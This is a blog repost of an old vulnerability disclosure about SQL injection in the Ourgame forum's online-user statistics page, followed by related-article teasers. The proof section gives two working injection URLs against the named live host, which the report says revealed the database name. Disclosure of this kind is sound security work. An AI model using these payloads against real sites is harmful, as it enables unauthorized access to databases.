联众世界论坛SQL注射漏洞

最新推荐文章于 2024-09-14 10:24:09 发布
最新推荐文章于 2024-09-14 10:24:09 发布
阅读量554 收藏
点赞数
文章标签: web安全 网络安全 安全 hack wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124173199
版权

漏洞详情

披露状态:

2010-07-23: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-23: 细节向公众公开

简要描述:

联众世界的联众论坛中的在线人数统计查询系统存在SQL注射漏洞。

详细说明:

联众论坛可查询某段日期的在线人数,参数为theDay,并使用DATEDIFF进行时间间隔计算,但是该处未正确使用DATEDIFF并对其值进行过滤,导致SQL注射漏洞。

漏洞证明:

http://bbs.ourgame.com/GLOnline/OnlineState.asp?theDay=2010-07-22%27%29%3E0+and+1%3D2+or+1%3D2+or+1%3D1+and+datediff%28dd%2C%271111-9-9%27%2C%271111-11-19
http://bbs.ourgame.com/GLOnline/OnlineState.asp?theDay=2010-07-22%27%29%3E0+and+1%3D2+or+1%3D2+or+1%3D2+and+datediff%28dd%2C%271111-9-9%27%2C%271111-11-19
获得数据库名为【GLBBSDB】

修复方案:

过滤关键字
正确使用DATEDIFF

Sword-heart
关注
联众世界某网站SQL注射漏洞
swordheart的博客
04-16 3216
漏洞详情 披露状态: 2010-07-26: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-26: 细节向公众公开 简要描述: 联众世界某网站存在SQL注射漏洞,并支持UNION。 详细说明: http://mgame.ourgame.com/user_look.aspx?ID=axyy
SQLMAP 实例COOKBOOK
CClarence的专栏
11-05 1154
转自http://drops.wooyun.org/tips/1343。 0x00 概述 本文章面向 已经理解SQL注射基本原理、已经配置好并了解SQLMAP基本命令、但缺乏实践的入门者。在文章中总结了自己在乌云上发布的近三十个SQL注射漏洞,对于SQLMAP在不同场景下的应用给出了 实例总结,对于SQLMAP的基本介绍、安装配置、命令手册请大家自行百度。 SQL
<googlehack>看看黑客们是如何用Google搜索的!
Welcome to Feng.Chang's Blog
03-03 1万+
GOOGLE Hack搜索技术  说起Google,可谓无人不知无人不晓。作为世界第一的搜索引擎,其强大的搜索功能,可以让你在瞬间找到你想要的一切。不过对于普通的计算机用户而言,Google是一个强大的搜索引擎;而对于黑客而言,则可能是一款绝佳的黑客工具。正因为google的检索能力强大,黑客可以构造特殊的关键字,使用Google搜索互联网上的相关隐私信息。通过Google,黑客甚至可以在几
java基础002
热门推荐
u014163736的博客
04-29 4万+
试卷一2013年年底的时候,我看到了网上流传的一个叫做《Java面试题大全》的东西,认真的阅读了以后发现里面的很多题目是重复且没有价值的题目,还有不少的参考答案也是错误的,于是我花了半个月时间对这个所谓的《Java面试大全》进行了全面的修订并重新发布在我的CSDN博客。在修订的过程中,参照了当时JDK最新版本(Java 7)给出了题目的答案和相关代码,去掉了EJB 2.x、JSF等无用内容或过时内...
联众世界游戏大厅2017Beta1官方安装版
07-30
联众游戏大厅是联众世界自主开发的一款集棋牌、休闲、对战于一体的游戏客户端, 用户可以通过游戏大厅迅速进入联众游戏世界,与来自世界各地的玩家同竞技,共欢乐。 更新内容: 1.美化游戏进入图标 2.修改了...
联众HIS4表结构.docx
08-11
### 联众HIS4表结构解析 #### 概述 浙江联众HIS4.0是一款专门针对医院信息管理系统的软件解决方案。本解析基于提供的文档内容进行深入分析,旨在帮助用户理解其核心模块——“病药”部分的具体表结构、主键设置以及...
联众识别HTTP_V2.1.ec
11-21
联众代答HTTP答题(联众_报错,联众_查询,联众_答题),系统核心支持库[krnln],通用对象支持库[commobj]
联众电子病历表结构文档.doc
08-11
联众电子病历表结构文档》是浙江联众卫生信息科技有限公司提供的关于电子病历系统的主要表结构的详细说明,旨在帮助ZJHIS、EMR3、EMR及EMRJK等用户理解并有效地操作和管理电子病历数据。文档由占贵顺和葛向东两位...
联众HIS系统表结构
04-26
### 联众HIS系统表结构解析 #### 一、概述 在医疗信息系统领域,HIS(Hospital Information System)即医院信息系统,是利用计算机软硬件技术、网络通信技术等现代信息技术,对医院及其所属各部门的人流、物流、财...
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 2319
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全漏洞挖掘
anquan2233的博客
08-29 1961
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 694
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
网络安全】-文件上传漏洞
weixin_65311462的博客
09-10 912
文件上传漏洞hacker能利用网站能让用户上传文件的功能,在上传过程中上传木马,直接连接或配合文件包含漏洞获取webshell,从而导致用户权限丢失,隐私泄露。成功getshell后hacker还可以长期控制受影响的网站或服务器,进行持续性的攻击和破坏,甚至会将受控制的服务器作为攻击其他目标的跳板,利用该服务器的资源和网络带宽发起更广泛的网络攻击。
网络安全漏洞挖掘:文件上传实现Webshell
等风来
09-10 423
接着,我上传webshell.php文件,文件内容为payload,拦截请求包,将文件名修改为jpg,但回显错误,这说明服务器验证了文件的内容。
网络安全】-文件上传漏洞实战-upload-labs(0~16)
weixin_65311462的博客
09-09 1488
准备:一句话木马:
零基础小白能学网络安全吗?
2401_83781461的博客
09-11 285
网络安全涉及很多内容、计算机网络、暴力破解、安全工具、漏洞扫描、渗透测试、社会工程学、密码学、编程能力等等等等,学习起来需要大量的时间和精力。首先,问出这个问题的朋友,我大致判断一下,你对网络安全并不了解,只是单纯看到某个视频某篇文章,对其感兴趣,说白了你没有足够的动力驱动。但这并不意味着你不能学习。如果你正好是相反之人,可以先接触学学看,如果真的很难理解其中的概念和原理,那么或许你真的不适合学习网络安全。在大众眼中,网络安全可能就是黑别人网站的,账号被盗了能帮忙找到的,还有遇见老赖问能不能找到这个人的。
网络安全】-文件下载漏洞-pikachu
weixin_65311462的博客
09-11 1055
网站对用户查看和下载文件不做限制,使hacker可以利用利用这些文件进行提权操作,完全控制服务器,进而以服务器为跳板攻击网站其他系统,进一步扩大攻击范围。文件上传漏洞是指hacker利用网站或web应用系统中用户上传文件的功能,在上传过程中上传恶意文件,这些恶意文件在服务器端被解析时产生漏洞,从而导致攻击者能够在服务器上执行任意代码的一种安全漏洞
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-11 895
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
Oracle数据字典与SQL调试技巧——联众卫生信息科技有限公司研发部分享
浙江联众卫生信息科技有限公司在His领域的Oracle知识涵盖了数据字典的使用、视图的查询、SQL的调试和性能优化,这些都是数据库管理员和开发人员日常工作中不可或缺的技能。通过这些知识,他们能够有效地管理和维护...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值